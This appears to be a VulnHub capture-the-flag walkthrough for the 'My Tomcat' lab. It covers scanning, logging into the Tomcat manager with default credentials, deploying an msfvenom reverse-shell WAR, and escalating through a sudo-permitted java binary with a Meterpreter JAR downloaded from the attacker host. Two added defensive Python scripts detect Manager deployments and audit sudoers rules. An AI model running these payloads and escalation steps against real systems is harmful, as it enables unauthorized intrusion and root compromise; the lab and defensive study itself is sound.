My Tomcat
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ sudo netdiscover -i eth1
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.112 08:00:27:33:cf:b8 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:d4:8b:8a 1 60 PCS Systemtechnik GmbH
Using Kali Linux's built-in netdiscover tool, the target host's IP address is identified as 192.168.56.112.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.112 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-09 21:27 EST
Nmap scan report for localhost (192.168.56.112)
Host is up (0.00072s latency).
Not shown: 65381 filtered tcp ports (no-response), 152 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey:
| 2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
| 256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
|_ 256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
8080/tcp open http Apache Tomcat 9.0.31
|_http-title: Apache Tomcat/9.0.31
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:33:CF:B8 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.89 seconds
The target host has two open ports: 22 (SSH) and 8080 (HTTP).
Get Access
From Kali Linux, browsing to port 8080 returns the Tomcat default page.
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ curl http://192.168.56.112:8080/robots.txt
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /robots.txt</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.31</h3></body></html>
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ gobuster dir -u http://192.168.56.112:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.112:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/09 21:32:58 Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/manager (Status: 302) [Size: 0] [--> /manager/]
/http%3A%2F%2Fwww (Status: 400) [Size: 804]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 804]
/axis2 (Status: 302) [Size: 0] [--> /axis2/]
/http%3A%2F%2Fblogs (Status: 400) [Size: 804]
/http%3A%2F%2Fblog (Status: 400) [Size: 804]
/**http%3A%2F%2Fwww (Status: 400) [Size: 804]
/External%5CX-News (Status: 400) [Size: 795]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 804]
/http%3A%2F%2Fradar (Status: 400) [Size: 804]
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 804]
/http%3A%2F%2Fweblog (Status: 400) [Size: 804]
/http%3A%2F%2Fswik (Status: 400) [Size: 804]
Progress: 219915 / 220561 (99.71%)
===============================================================
2022/11/09 21:34:07 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ nikto -h http://192.168.56.112:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.112
+ Target Hostname: 192.168.56.112
+ Target Port: 8080
+ Start Time: 2022-11-09 21:34:19 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ dirb http://192.168.56.112:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 9 21:38:01 2022
URL_BASE: http://192.168.56.112:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.112:8080/ ----
+ http://192.168.56.112:8080/axis2 (CODE:302|SIZE:0)
+ http://192.168.56.112:8080/docs (CODE:302|SIZE:0)
+ http://192.168.56.112:8080/examples (CODE:302|SIZE:0)
+ http://192.168.56.112:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://192.168.56.112:8080/host-manager (CODE:302|SIZE:0)
+ http://192.168.56.112:8080/manager (CODE:302|SIZE:0)
-----------------
END_TIME: Wed Nov 9 21:38:08 2022
DOWNLOADED: 4612 - FOUND: 6
The scans turned up the /manager directory. A quick internet search for the default Tomcat manager username and password gives tomcat / tomcat; trying them on the /manager page logs in successfully!!
The manager allows file uploads, so let's see whether a WAR file built with msfvenom can be used.
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.107 LPORT=5555 -f war > shell.war
Final size of war file: 1102 bytes
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ ls
nmap_full_scan shell.war
shell.war was successfully uploaded to the target host.
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.112] 48230
id
uid=998(tomcat) gid=997(tomcat) groups=997(tomcat)
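From the defender's side, the step that planted shell.war leaves a clear trace in Tomcat's access log. The following Python script is an added example (not part of the original walkthrough): it parses access-log lines in Tomcat's default "common" pattern, flags successful deployments through the Manager app, and lists authenticated Manager requests so a default-named account like tomcat stands out; the log lines are constructed samples modelled on this lab.

```python
import re
from typing import Dict, List, Optional

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Manager endpoints that install application code: the HTML GUI upload form
# and the text (scripting) interface used by tools and build plugins.
DEPLOY_ENDPOINTS = ("/manager/html/upload", "/manager/text/deploy")

# Constructed sample log, modelled on the lab host (not real captured data).
SAMPLE_LOG = [
    '192.168.56.107 - - [09/Nov/2022:21:40:01 -0500] "GET /manager/html HTTP/1.1" 401 2473',
    '192.168.56.107 - tomcat [09/Nov/2022:21:40:05 -0500] "GET /manager/html HTTP/1.1" 200 17890',
    '192.168.56.107 - tomcat [09/Nov/2022:21:41:12 -0500] '
    '"POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 18100',
    '192.168.56.107 - - [09/Nov/2022:21:41:20 -0500] "GET /shell/ HTTP/1.1" 200 0',
    '192.168.56.1 - - [09/Nov/2022:21:42:00 -0500] "GET /docs/ HTTP/1.1" 200 5120',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_manager_deployments(lines: List[str]) -> List[Dict[str, str]]:
    """One finding per successful (2xx) POST/PUT to a Manager deploy endpoint."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["status"].startswith("2"):
            continue
        path = rec["path"].split("?", 1)[0]  # drop the query string (CSRF nonce etc.)
        if rec["method"] in ("POST", "PUT") and path.startswith(DEPLOY_ENDPOINTS):
            findings.append({"host": rec["host"], "user": rec["user"],
                             "time": rec["time"], "path": path})
    return findings


def manager_logins(lines: List[str]) -> List[Dict[str, str]]:
    """Authenticated, successful Manager requests: shows which account is in use."""
    return [{"host": r["host"], "user": r["user"]}
            for r in map(parse_line, lines)
            if r and r["user"] != "-" and r["path"].startswith("/manager/") and r["status"] == "200"]


if __name__ == "__main__":
    for f in find_manager_deployments(SAMPLE_LOG):
        print(f"[!] application deployed via Manager by {f['user']} from {f['host']} at {f['time']}")
```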
Privilege escalation
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ ls /
ls /
bin dev home lib64 mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tomcat:x:998:997::/usr/local/tomcat9/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
bash-4.2$ cat /etc/*release
cat /etc/*release
CentOS Linux release 7.7.1908 (Core)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
CentOS Linux release 7.7.1908 (Core)
CentOS Linux release 7.7.1908 (Core)
bash-4.2$ uname -a
uname -a
Linux my_tomcat 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ cd /home
cd /home
bash-4.2$ ls -alh
ls -alh
total 4.0K
drwxr-xr-x. 2 root root 6 Jun 9 2014 .
dr-xr-xr-x. 17 root root 4.0K Feb 21 2020 ..
bash-4.2$ sudo -l
sudo -l
Matching Defaults entries for tomcat on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User tomcat may run the following commands on this host:
(ALL) NOPASSWD:
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java
Looking at the sudo -l output, we can use the command /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java to escalate privileges.
Use msfvenom to build another reverse-shell payload, this time as a JAR (not a WAR: a JAR is run directly by java, whereas a WAR is run by Tomcat).
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.107 LPORT=6666 -f jar -o escalate.jar
Payload size: 5270 bytes
Final size of jar file: 5270 bytes
Saved as: escalate.jar
Start an HTTP server with Python on the local Kali Linux machine, then download the escalate.jar payload on the target.
bash-4.2$ wget http://192.168.56.107:8000/escalate.jar
wget http://192.168.56.107:8000/escalate.jar
--2022-11-09 22:10:28-- http://192.168.56.107:8000/escalate.jar
Connecting to 192.168.56.107:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5270 (5.1K) [application/java-archive]
Saving to: ‘escalate.jar’
100%[======================================>] 5,270 --.-K/s in 0s
2022-11-09 22:10:28 (428 MB/s) - ‘escalate.jar’ saved [5270/5270]
bash-4.2$ ls
ls
escalate.jar hsperfdata_root hsperfdata_tomcat
bash-4.2$ sudo -u root /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar /tmp/escalate.jar
<k-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar /tmp/escalate.jar
bash-4.2$
Kali Linux successfully receives the reverse connection.
┌──(kali㉿kali)-[~/Vulnhub/My_Tomcat]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.112] 56162
id
But for some reason it throws the following error, which looks like running out of memory:
java.lang.OutOfMemoryError: Java heap space
at metasploit.Payload.bootstrap(Unknown Source)
at metasploit.Payload.main(Unknown Source)
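The sudo -l entry that made this escalation possible is exactly the kind of finding a sudoers audit should catch first. The following Python example is added here and is not from the original post: it parses sudoers-style lines and flags rules that grant a code runtime such as java (which runs whatever JAR it is given), or NOPASSWD on ALL; the sudoers text and the list of runtimes are constructed assumptions modelled on this lab host.

```python
import re
from typing import Dict, List

# Programs that run whatever code they are handed; sudo rights on any of them
# are effectively rights to run anything as the runas user. Illustrative set (an assumption).
CODE_RUNTIMES = {"java", "python", "python2", "python3", "perl", "ruby", "node"}

# user_or_%group  host=(runas) [TAG: ...] command[, command...]
SUDOERS_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)

# Constructed sudoers content, modelled on the lab host (not a real file).
SAMPLE_SUDOERS = """
Defaults requiretty, env_reset
root ALL=(ALL) ALL
%wheel ALL=(ALL) ALL
tomcat ALL=(ALL) NOPASSWD: /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java
deploy ALL=(root) /usr/bin/systemctl restart tomcat, /usr/bin/python3
backup ALL=(ALL) NOPASSWD: ALL
"""


def audit_sudoers(text: str) -> List[Dict[str, object]]:
    """Flag entries that hand out a code runtime, or NOPASSWD on ALL."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = SUDOERS_RE.match(line)
        if m is None:
            continue
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            program = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
            if cmd == "ALL" and nopasswd:
                reason = "passwordless sudo for every command"
            elif program in CODE_RUNTIMES:
                reason = f"{program} executes arbitrary code passed as its argument"
            else:
                continue
            findings.append({"user": m["who"], "runas": m["runas"], "command": cmd,
                             "program": program, "nopasswd": nopasswd, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"[!] {f['user']} -> ({f['runas']}) {tag}{f['command']}: {f['reason']}")
```

Rules like root's or %wheel's plain "ALL" with a password are left alone, since that is the normal administrator configuration; only the passwordless or runtime-granting entries are reported.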